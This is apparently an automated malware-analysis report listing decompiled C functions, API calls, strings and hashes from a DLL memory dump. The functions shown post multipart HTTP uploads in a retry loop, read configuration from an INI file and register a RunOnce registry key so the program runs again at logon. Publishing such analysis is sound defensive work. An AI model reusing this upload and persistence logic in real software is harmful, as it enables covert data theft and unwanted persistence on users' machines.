						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
						_t156 = _t154 + 0x28;
						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
						_t154 = _t156 + 0xc;
						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
					}
					if(HttpSendRequestExA(_t117, 0, 0, 0, 0) == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t145 != 0) {
							HeapFree(GetProcessHeap(), 0, _t145);
						}
						HeapFree(GetProcessHeap(), 0, _t148);
						_t149 =  *(_t154 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
					_t94 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
					_t154 = _t154 + 0xc;
					_t152 =  *((intOrPtr*)(_t154 + 0x40));
					if(_t94 != _t151) {
						L19:
						HttpEndRequestA(_t117, 0, 0, 0);
						if( *(_t154 + 0x1c) != 0) {
							_t96 = E6F335540(_t117, _t152 + 0x2c);
							_t154 = _t154 + 8;
							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
						}
						goto L21;
					}
					_t97 = _t152 + 0x18;
					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
						L13:
						_t98 = _t152 + 0x20;
						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
							L15:
							_t99 = _t152 + 0x28;
							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
								L17:
								 *(_t154 + 0x30) =  *(_t154 + 0x18);
								_t101 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
								_t154 = _t154 + 0xc;
								if(_t101 ==  *(_t154 + 0x18)) {
									 *(_t154 + 0x1c) = 1;
								}
								goto L19;
							}
							_t102 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
							_t154 = _t154 + 0xc;
							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t103 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
						_t154 = _t154 + 0xc;
						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t105 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
					_t154 = _t154 + 0xc;
					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}





























                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c8
                                                                                                                        0x6f3356d0
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356da
                                                                                                                        0x6f3356ee
                                                                                                                        0x6f3356f0
                                                                                                                        0x6f3356f6
                                                                                                                        0x6f3359bd
                                                                                                                        0x6f3359c5
                                                                                                                        0x6f3359f1
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359cc
                                                                                                                        0x00000000
                                                                                                                        0x6f3359cc
                                                                                                                        0x6f33570c
                                                                                                                        0x6f335714
                                                                                                                        0x6f335720
                                                                                                                        0x6f33572c
                                                                                                                        0x6f33573e
                                                                                                                        0x6f335754
                                                                                                                        0x6f335756
                                                                                                                        0x6f33575c
                                                                                                                        0x6f3359ab
                                                                                                                        0x6f3359ac
                                                                                                                        0x6f3359b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x6f335782
                                                                                                                        0x6f335786
                                                                                                                        0x6f3359a4
                                                                                                                        0x6f3359a5
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a5
                                                                                                                        0x6f3357a2
                                                                                                                        0x6f3357a6
                                                                                                                        0x6f335999
                                                                                                                        0x6f33599a
                                                                                                                        0x6f3359a0
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a0
                                                                                                                        0x6f3357b7
                                                                                                                        0x6f3357bd
                                                                                                                        0x6f3357c8
                                                                                                                        0x6f3357ce
                                                                                                                        0x6f3357d0
                                                                                                                        0x6f3357d4
                                                                                                                        0x6f3357d8
                                                                                                                        0x6f3357e7
                                                                                                                        0x6f3357f8
                                                                                                                        0x6f335805
                                                                                                                        0x6f335809
                                                                                                                        0x6f33581f
                                                                                                                        0x6f33582e
                                                                                                                        0x6f335830
                                                                                                                        0x6f335830
                                                                                                                        0x6f33583a
                                                                                                                        0x6f33583e
                                                                                                                        0x6f335844
                                                                                                                        0x6f33584e
                                                                                                                        0x6f335860
                                                                                                                        0x6f335866
                                                                                                                        0x6f335871
                                                                                                                        0x6f335882
                                                                                                                        0x6f335888
                                                                                                                        0x6f335893
                                                                                                                        0x6f335893
                                                                                                                        0x6f3358aa
                                                                                                                        0x6f3359e2
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f335971
                                                                                                                        0x6f335973
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33598f
                                                                                                                        0x6f335995
                                                                                                                        0x00000000
                                                                                                                        0x6f335995
                                                                                                                        0x6f3358bb
                                                                                                                        0x6f3358bf
                                                                                                                        0x6f3358c4
                                                                                                                        0x6f3358c9
                                                                                                                        0x6f3358cd
                                                                                                                        0x6f33594c
                                                                                                                        0x6f335953
                                                                                                                        0x6f33595e
                                                                                                                        0x6f335965
                                                                                                                        0x6f33596a
                                                                                                                        0x6f33596d
                                                                                                                        0x6f33596d
                                                                                                                        0x00000000
                                                                                                                        0x6f33595e
                                                                                                                        0x6f3358d3
                                                                                                                        0x6f3358d6
                                                                                                                        0x6f3358eb
                                                                                                                        0x6f3358ef
                                                                                                                        0x6f3358f2
                                                                                                                        0x6f335907
                                                                                                                        0x6f33590b
                                                                                                                        0x6f33590e
                                                                                                                        0x6f335923
                                                                                                                        0x6f335932
                                                                                                                        0x6f335936
                                                                                                                        0x6f33593b
                                                                                                                        0x6f335942
                                                                                                                        0x6f335944
                                                                                                                        0x6f335944
                                                                                                                        0x00000000
                                                                                                                        0x6f335942
                                                                                                                        0x6f335916
                                                                                                                        0x6f33591b
                                                                                                                        0x6f335921
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335921
                                                                                                                        0x6f3358fa
                                                                                                                        0x6f3358ff
                                                                                                                        0x6f335905
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335905
                                                                                                                        0x6f3358de
                                                                                                                        0x6f3358e3
                                                                                                                        0x6f3358e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3358e9

                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        Strings
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseHandleHeadersOption$AllocCountFreeOpenTick$ConnectRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 1438124730-2948876467
                                                                                                                        • Opcode ID: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction ID: 2d51272c1173d9ffcb8a03b69d0064296ed9a9be5b73b236c802b838761fdf0f
                                                                                                                        • Opcode Fuzzy Hash: df19d0c201741c97b306c486ca984b4fc86e0f28d2163465dfd1d885eac4ca06
                                                                                                                        • Instruction Fuzzy Hash: A291B0B290478AAFD760DF24CC89F6B77ADEF88725F00050CFA4596181DB74F8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F336A90, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 224memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F336A90(CHAR* _a4, intOrPtr _a8) {
				void _v264;
				char _v266;
				char _v267;
				char _v268;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				short _v275;
				char _v276;
				void* _t53;
				CHAR* _t55;
				CHAR* _t56;
				CHAR* _t59;
				CHAR* _t60;
				CHAR* _t62;
				CHAR* _t70;
				CHAR* _t72;
				CHAR* _t73;
				int _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t78;
				CHAR* _t80;
				char _t81;
				void* _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				char _t97;
				CHAR* _t103;
				CHAR* _t104;
				CHAR* _t105;
				int _t108;
				CHAR* _t110;
				CHAR* _t113;
				CHAR* _t121;
				CHAR* _t122;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t132;
				int _t133;
				int _t135;
				CHAR* _t139;

				_t139 = _a4;
				if(_t139 != 0) {
					_t88 = _t139[4];
					if(_t88 != 0) {
						HeapFree(GetProcessHeap(), 0, _t88);
					}
					_t53 = _t139[8];
					if(_t53 != 0) {
						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
					}
				}
				if(_a8 != 0) {
					return _t53;
				} else {
					if(_t139 == 0) {
						_t86 = M6F3404CC; // 0x99d818
						_t132 = M6F3404DC; // 0x99b1c8
						_v268 = 0x67;
						_v267 = 0x64;
						_v266 = 0;
						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
					}
					_v275 = 0x64;
					asm("sbb bl, bl");
					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
					_v273 = 0;
					_v276 = 0x68;
					_v274 = _t97;
					E6F331D30(0x6f340034);
					_t55 = M6F3404CC; // 0x99d818
					_t56 = M6F3404DC; // 0x99b1c8
					_t133 = GetPrivateProfileStringA(_t56,  &_v276, 0x6f340034,  &_v264, 0x104, _t55);
					E6F331D30(0x6f340034);
					if(_t139 == 0) {
						_t59 = M6F3404CC; // 0x99d818
						_t60 = M6F3404DC; // 0x99b1c8
						_v274 = 0x63;
						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
						_t103 = M6F3404CC; // 0x99d818
						_t62 = M6F3404DC; // 0x99b1c8
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
					} else {
						_t15 = _t133 + 1; // 0x1
						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
						_t139[4] = _t85;
						RtlMoveMemory(_t85,  &_v264, _t133);
						 *_t139 = _t133;
					}
					_v275 = 0x70;
					_v274 = _t97;
					E6F331D30(0x6f340010);
					_t104 = M6F3404CC; // 0x99d818
					_t105 = M6F3404DC; // 0x99b1c8
					_t135 = GetPrivateProfileStringA(_t105,  &_v276, 0x6f340010,  &_v264, 0x104, _t104);
					E6F331D30(0x6f340010);
					if(_t139 == 0) {
						_t121 = M6F3404CC; // 0x99d818
						_t122 = M6F3404DC; // 0x99b1c8
						_v274 = 0x63;
						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
						_t70 = M6F3404CC; // 0x99d818
						_t123 = M6F3404DC; // 0x99b1c8
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
					} else {
						_t27 = _t135 + 1; // 0x1
						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
						_t139[8] = _t83;
						RtlMoveMemory(_t83,  &_v264, _t135);
					}
					_t72 = M6F3404CC; // 0x99d818
					_t108 =  *0x6f34000c; // 0x1
					_t73 = M6F3404DC; // 0x99b1c8
					_t124 =  &_v276;
					_v274 = _t97;
					_v275 = 0x73;
					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72);
					if(_t139 != 0) {
						_v275 = 0x74;
						_t139[0xc] = 0 | _t74 != 0x00000000;
						_t113 = M6F3404CC; // 0x99d818
						_t80 = M6F3404DC; // 0x99b1c8
						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113);
						_t139[0x10] = _t81;
						return _t81;
					}
					_t75 = M6F3404CC; // 0x99d818
					_t76 = M6F3404DC; // 0x99b1c8
					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
					_v271 = 0;
					_v274 = 0x63;
					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
					_t110 = M6F3404CC; // 0x99d818
					_t78 = M6F3404DC; // 0x99b1c8
					_v274 = 0x6e;
					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
				}
			}















































                                                                                                                        0x6f336a97
                                                                                                                        0x6f336aa1
                                                                                                                        0x6f336aa3
                                                                                                                        0x6f336aae
                                                                                                                        0x6f336aba
                                                                                                                        0x6f336aba
                                                                                                                        0x6f336abc
                                                                                                                        0x6f336ac1
                                                                                                                        0x6f336acd
                                                                                                                        0x6f336acd
                                                                                                                        0x6f336ac1
                                                                                                                        0x6f336ad7
                                                                                                                        0x6f336cee
                                                                                                                        0x6f336add
                                                                                                                        0x6f336ae2
                                                                                                                        0x6f336ae4
                                                                                                                        0x6f336ae9
                                                                                                                        0x6f336af7
                                                                                                                        0x6f336afc
                                                                                                                        0x6f336b00
                                                                                                                        0x6f336b05
                                                                                                                        0x6f336b05
                                                                                                                        0x6f336b0b
                                                                                                                        0x6f336b13
                                                                                                                        0x6f336b19
                                                                                                                        0x6f336b21
                                                                                                                        0x6f336b26
                                                                                                                        0x6f336b2b
                                                                                                                        0x6f336b2f
                                                                                                                        0x6f336b34
                                                                                                                        0x6f336b43
                                                                                                                        0x6f336b64
                                                                                                                        0x6f336b66
                                                                                                                        0x6f336b70
                                                                                                                        0x6f336b98
                                                                                                                        0x6f336ba4
                                                                                                                        0x6f336bb4
                                                                                                                        0x6f336bb9
                                                                                                                        0x6f336bbb
                                                                                                                        0x6f336bc1
                                                                                                                        0x6f336bcf
                                                                                                                        0x6f336bd4
                                                                                                                        0x6f336b72
                                                                                                                        0x6f336b72
                                                                                                                        0x6f336b7f
                                                                                                                        0x6f336b8c
                                                                                                                        0x6f336b8f
                                                                                                                        0x6f336b94
                                                                                                                        0x6f336b94
                                                                                                                        0x6f336bdb
                                                                                                                        0x6f336be0
                                                                                                                        0x6f336be4
                                                                                                                        0x6f336be9
                                                                                                                        0x6f336bf3
                                                                                                                        0x6f336c15
                                                                                                                        0x6f336c17
                                                                                                                        0x6f336c22
                                                                                                                        0x6f336c4e
                                                                                                                        0x6f336c5b
                                                                                                                        0x6f336c6c
                                                                                                                        0x6f336c71
                                                                                                                        0x6f336c73
                                                                                                                        0x6f336c78
                                                                                                                        0x6f336c87
                                                                                                                        0x6f336c8c
                                                                                                                        0x6f336c24
                                                                                                                        0x6f336c24
                                                                                                                        0x6f336c31
                                                                                                                        0x6f336c3e
                                                                                                                        0x6f336c41
                                                                                                                        0x6f336c46
                                                                                                                        0x6f336c8e
                                                                                                                        0x6f336c93
                                                                                                                        0x6f336c9a
                                                                                                                        0x6f336ca0
                                                                                                                        0x6f336ca5
                                                                                                                        0x6f336cb0
                                                                                                                        0x6f336cb5
                                                                                                                        0x6f336cb9
                                                                                                                        0x6f336cc6
                                                                                                                        0x6f336ccd
                                                                                                                        0x6f336cd0
                                                                                                                        0x6f336cd6
                                                                                                                        0x6f336ce0
                                                                                                                        0x6f336ce2
                                                                                                                        0x00000000
                                                                                                                        0x6f336ce5
                                                                                                                        0x6f336cf2
                                                                                                                        0x6f336cfb
                                                                                                                        0x6f336d07
                                                                                                                        0x6f336d12
                                                                                                                        0x6f336d17
                                                                                                                        0x6f336d1c
                                                                                                                        0x6f336d1e
                                                                                                                        0x6f336d24
                                                                                                                        0x6f336d32
                                                                                                                        0x6f336d42
                                                                                                                        0x6f336d42

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6F336AB3
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ABA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6F336AC6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336ACD
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336B05
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(0099B1C8,?,6F340034,?,00000104,0099D818), ref: 6F336B5D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336B78
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336B7F
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336B8F
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336BB9
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336BD4
                                                                                                                        • GetPrivateProfileStringA.KERNEL32(0099B1C8,?,6F340010,?,00000104,0099D818), ref: 6F336C0E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 6F336C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F336C31
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6F336C41
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F336C71
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336C8C
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CB5
                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 6F336CE0
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336D1C
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,00000000,0099D818), ref: 6F336D37
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                                        • String ID: g$h$n$n$p$s$t
                                                                                                                        • API String ID: 1023576463-1140765434
                                                                                                                        • Opcode ID: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction ID: bec72dedb32c6849fc37aabeba5ee61e32b396e40ad84842c132cdbd07fd08d7
                                                                                                                        • Opcode Fuzzy Hash: 0cde5862f183b121c62cf92efa75a81c7e92221fb73e9a1897498a688dcb8c77
                                                                                                                        • Instruction Fuzzy Hash: 468192B2618782AFD700DB68C844E5BB7EDABAA714F04890CF59497380D675E91CCB72
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334CA0, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 150memoryregistrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334CA0(void* __eflags, intOrPtr _a12) {
				int _v252;
				char _v256;
				int _v260;
				int _v264;
				void* _v276;
				void* _v284;
				char _v288;
				intOrPtr _t25;
				void* _t26;
				long _t31;
				int _t34;
				char* _t37;
				char* _t45;
				int _t49;
				int _t56;
				char* _t59;
				char* _t60;
				char* _t71;
				CHAR* _t73;
				void* _t74;
				CHAR* _t76;

				_t25 = M6F340588; // 0x7488d8
				_t26 = E6F33A2F0(_t25, 0, 0);
				_t74 = _t26;
				if(_t74 != 0) {
					_v288 = 0x4f6e7552;
					_v284 = 0x65636e;
					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
					HeapFree(GetProcessHeap(), 0, _t74);
					_v284 = 0;
					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0);
					if(_t31 != 0) {
						L14:
						return _t31;
					}
					if(_a12 == 0) {
						_v264 = 0;
						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						if(_t73 == 0) {
							L13:
							_t31 = RegCloseKey(_v284);
							goto L14;
						}
						_t59 = M6F340530; // 0x997378
						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
						_t60 = M6F34053C; // 0x9973a5
						_v252 = _t34;
						_v264 = 0;
						_v260 = 1;
						if(RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264) != 0) {
							L11:
							_t37 = M6F34053C; // 0x9973a5
							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1);
							L12:
							HeapFree(GetProcessHeap(), 0, _t73);
							goto L13;
						}
						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
						if(_t76 == 0) {
							goto L11;
						}
						_t45 = M6F34053C; // 0x9973a5
						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
							L9:
							_t56 = _v256;
							L10:
							HeapFree(GetProcessHeap(), 0, _t76);
							if(_t56 != 0) {
								goto L12;
							}
							goto L11;
						}
						_t49 = lstrcmpiA(_t76, _t73);
						_t56 = 1;
						if(_t49 == 0) {
							goto L10;
						}
						goto L9;
					}
					_t71 = M6F34053C; // 0x9973a5
					RegDeleteValueA(_v284, _t71);
					goto L13;
				}
				return _t26;
			}
























                                                                                                                        0x6f334ca0
                                                                                                                        0x6f334cb2
                                                                                                                        0x6f334cb7
                                                                                                                        0x6f334cbe
                                                                                                                        0x6f334cdc
                                                                                                                        0x6f334ce4
                                                                                                                        0x6f334cec
                                                                                                                        0x6f334cfc
                                                                                                                        0x6f334d1b
                                                                                                                        0x6f334d1f
                                                                                                                        0x6f334d27
                                                                                                                        0x6f334e42
                                                                                                                        0x00000000
                                                                                                                        0x6f334e43
                                                                                                                        0x6f334d34
                                                                                                                        0x6f334d54
                                                                                                                        0x6f334d63
                                                                                                                        0x6f334d67
                                                                                                                        0x6f334e37
                                                                                                                        0x6f334e3c
                                                                                                                        0x00000000
                                                                                                                        0x6f334e3c
                                                                                                                        0x6f334d6d
                                                                                                                        0x6f334d7a
                                                                                                                        0x6f334d7c
                                                                                                                        0x6f334d96
                                                                                                                        0x6f334da3
                                                                                                                        0x6f334dab
                                                                                                                        0x6f334db7
                                                                                                                        0x6f334e0f
                                                                                                                        0x6f334e13
                                                                                                                        0x6f334e25
                                                                                                                        0x6f334e2b
                                                                                                                        0x6f334e31
                                                                                                                        0x00000000
                                                                                                                        0x6f334e31
                                                                                                                        0x6f334dc6
                                                                                                                        0x6f334dca
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334dcc
                                                                                                                        0x6f334de8
                                                                                                                        0x6f334dfb
                                                                                                                        0x6f334dfb
                                                                                                                        0x6f334dff
                                                                                                                        0x6f334e05
                                                                                                                        0x6f334e0d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334e0d
                                                                                                                        0x6f334dec
                                                                                                                        0x6f334df2
                                                                                                                        0x6f334df9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334df9
                                                                                                                        0x6f334d36
                                                                                                                        0x6f334d42
                                                                                                                        0x00000000
                                                                                                                        0x6f334d42
                                                                                                                        0x6f334e4c

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                        • wsprintfA.USER32 ref: 6F334CEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,009973A5), ref: 6F334D42
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F334D58
